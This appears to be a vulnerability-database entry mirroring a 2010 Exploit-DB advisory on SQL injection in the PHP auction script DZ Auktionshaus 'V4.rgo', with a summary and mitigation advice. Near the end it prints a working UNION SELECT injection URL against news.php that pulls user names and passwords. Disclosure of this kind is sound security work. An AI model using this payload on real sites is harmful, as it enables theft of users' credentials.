DZ Auktionshaus "V4.rgo" (id) news.php SQL Injection

vendor:

V4.rgo

by:

Easy Laster

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: V4.rgo

Affected Version From: V4.rgo

Affected Version To: V4.rgo

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: PHP

2010

DZ Auktionshaus “V4.rgo” (id) news.php SQL Injection

The vulnerability exists in the 'news.php' script, which allows an attacker to inject malicious SQL queries via the 'id' parameter. The exploit can be triggered by sending a crafted HTTP request to the vulnerable server, containing a malicious SQL query in the 'id' parameter. This can be exploited to extract sensitive information from the database, such as usernames and passwords.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

----------------------------Information------------------------------------------------
+Name : DZ Auktionshaus "V4.rgo" (id) news.php SQL Injection
+Autor : Easy Laster
+Date   : 08.03.2010
+Script  : DZ Auktionshaus "V4.rgo"
+Price : 99,99€
+Language :PHP
+Discovered by Easy Laster
+Security Group 4004-Security-Project
+Greetz to Team-Internet ,Underground Agents
+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
Kiba,-tmh-,Dr Chaos,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
N00bor,Ic3Drag0n,novaca!ne.

---------------------------------------------------------------------------------------
                                                                                     
 ___ ___ ___ ___                         _ _           _____           _         _   
| | |   |   | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___|  _  |___ ___  |_|___ ___| |_ 
|_  | | | | |_  |___|_ -| -_|  _| | |  _| |  _| | |___|   __|  _| . | | | -_|  _|  _|
  |_|___|___| |_|   |___|___|___|___|_| |_|_| |_  |   |__|  |_| |___|_| |___|___|_|  
                                              |___|                 |___|            


----------------------------------------------------------------------------------------
+Vulnerability : http://server/auktionshaus/index.php?view=read&id=
+Exploitable   : http://server/auktionshaus/news.php?id=null+union+select+1,2,concat
(name,0x3a,password),4,5+from+users#
-----------------------------------------------------------------------------------------